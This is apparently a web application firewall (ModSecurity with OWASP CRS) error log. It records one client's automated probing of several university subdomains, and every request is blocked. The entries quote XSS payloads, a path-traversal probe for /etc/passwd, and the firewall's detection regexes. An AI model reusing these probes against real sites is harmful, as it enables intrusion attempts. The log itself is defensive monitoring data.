[Tue Aug 29 11:56:33.777109 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:a</script><script>alert(/XSS/)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:a</script><script>alert(/XSS/)</script>: a</script><script>alert(/XSS/)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/aa404bb"] [unique_id "ZO16gcCo-f0AAAqsV@oAAAAB"]
[Tue Aug 29 11:56:34.554359 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:a</script><script>alert(/XSS/)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:a</script><script>alert(/XSS/)</script>: a</script><script>alert(/XSS/)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/aa404bb"] [unique_id "ZO16gsCo-f0AAAqsV@sAAAAB"]
[Tue Aug 29 11:56:34.576213 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:srch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:srch: x\\x22 onmouseover=alert(1) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16gsCo-f0AAAqsV@wAAAAB"]
[Tue Aug 29 11:56:34.591205 2023] [:error] [pid 2764] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:srch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:srch: x\\x22 onmouseover=alert(1) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16gsCo-f0AAArMmroAAAAf"]
[Tue Aug 29 11:56:34.591799 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:srch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:srch: x\\x22 onmouseover=alert(1) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16gsCo-f0AAAq3a-wAAAAI"]
[Tue Aug 29 11:56:34.591811 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:srch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:srch: x\\x22 onmouseover=alert(1) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16gsCo-f0AAAq@smYAAAAM"]
[Tue Aug 29 11:56:34.610359 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:srch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:srch: x\\x22 onmouseover=alert(1) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16gsCo-f0AAAoz8LEAAAAS"]
[Tue Aug 29 11:56:35.627374 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:srch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:srch: x\\x22 onmouseover=alert(1) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16g8Co-f0AAAq@smkAAAAM"]
[Tue Aug 29 11:56:36.527893 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/home/get_products"] [unique_id "ZO16hMCo-f0AAArB12wAAAAV"]
[Tue Aug 29 11:56:36.559067 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:class: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16hMCo-f0AAArB120AAAAV"]
[Tue Aug 29 11:56:36.568982 2023] [:error] [pid 2759] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/home/get_products"] [unique_id "ZO16hMCo-f0AAArHa4cAAAAJ"]
[Tue Aug 29 11:56:36.572510 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:class: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16hMCo-f0AAAq@smsAAAAM"]
[Tue Aug 29 11:56:36.642691 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/home/get_products"] [unique_id "ZO16hMCo-f0AAAqeFqkAAAAx"]
[Tue Aug 29 11:56:36.647179 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/home/get_products"] [unique_id "ZO16hMCo-f0AAAqsV-EAAAAB"]
[Tue Aug 29 11:56:36.672412 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:class: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16hMCo-f0AAAqsV-IAAAAB"]
[Tue Aug 29 11:56:36.679923 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:class: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16hMCo-f0AAAq@sm4AAAAM"]
[Tue Aug 29 11:56:36.680233 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/home/get_products"] [unique_id "ZO16hMCo-f0AAAocyk8AAAAR"]
[Tue Aug 29 11:56:36.694390 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:class: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16hMCo-f0AAAqsV-MAAAAB"]
[Tue Aug 29 11:56:37.537854 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: 16170297</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16hcCo-f0AAAq@snAAAAAM"]
[Tue Aug 29 11:56:37.602650 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: 16170297</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16hcCo-f0AAAqeFrAAAAAx"]
[Tue Aug 29 11:56:37.636711 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: 16170297</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16hcCo-f0AAAq@snQAAAAM"]
[Tue Aug 29 11:56:37.643038 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: 16170297</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16hcCo-f0AAAq3bAoAAAAI"]
[Tue Aug 29 11:56:37.664158 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/home/get_products"] [unique_id "ZO16hcCo-f0AAAqeFrMAAAAx"]
[Tue Aug 29 11:56:37.665044 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:class: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16hcCo-f0AAAq@snUAAAAM"]
[Tue Aug 29 11:56:38.719518 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: 16170297</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16hsCo-f0AAAq3bA4AAAAI"]
[Tue Aug 29 11:56:38.820848 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: 16170297</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16hsCo-f0AAAocylYAAAAR"]
[Tue Aug 29 11:56:39.531123 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:user: j\\x22;-alert(1)-\\x22x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/global-protect/login.esp"] [unique_id "ZO16h8Co-f0AAAoz8L8AAAAS"]
